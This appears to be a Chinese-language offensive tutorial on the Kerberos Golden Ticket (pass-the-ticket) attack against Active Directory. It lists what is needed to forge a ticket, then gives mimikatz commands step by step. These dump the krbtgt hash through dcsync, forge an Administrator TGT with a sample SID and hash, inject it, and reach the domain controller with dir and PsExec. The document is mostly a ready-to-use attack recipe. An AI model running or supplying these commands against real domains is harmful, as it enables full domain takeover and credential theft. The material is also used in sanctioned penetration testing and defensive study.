Skip to main content

票据传递攻击(PTT) 黄金票据


0x01 黄金票据

域中每个用户的 Ticket 都是由 krbtgt 的密码 Hash 来计算生成的,因此只要获取到了 krbtgt 用户的密码 Hash ,就可以随意伪造 Ticket ,进而使用 Ticket 登陆域控制器,使用 krbtgt 用户 hash 生成的票据被称为 Golden Ticket,此类攻击方法被称为票据传递攻击。

黄金票据就是伪造TGT (控制servername可以访问任意server)

目的是client跳过AS认证, 伪造TGT直接发给TGS请求ST,伪造TGT的重点是 krbtgt的hash 。

CT_SK统一即可。

0x02 黄金票据的伪造条件

1、域名称(net config workstation )

2、域的SID值(whoami /user)

3、域的KRBTGT账号的HASH (lsadump::dcsync /domain:test.com /all /csv)

4、伪造任意用户名(随便写)

0x03 黄金票据利用

dc执行:

首先在域控上导出krbtgt的用户hash:

mimikatz.exe log "lsadump::dcsync /domain:dbapp.lab /user:krbtgt"

在域用户上执行:

利用 mimikatz 生成域管权限的 Golden Ticket,填入对应的域管理员账号、域名称、sid值,如下:

kerberos::golden /user:Administrator /domain:dbapp.lab /sid:S-1-5-21-2476688485-4256841910-2155116890 /krbtgt:dbd96281f999cc0a3fbe58dc217ea11d /ticket:test.kirbi
kerberos::purge   \\清除票据
kerberos::tgt     \\查看票据

#导入刚才生成的票据
kerberos::ptt test.kirbi

PS: 以管理员权限运行窗口

#导入成功后可获取域管权限
dir \\dc.abc.com\c$

Psexec.exe \\dc -s cmd.exe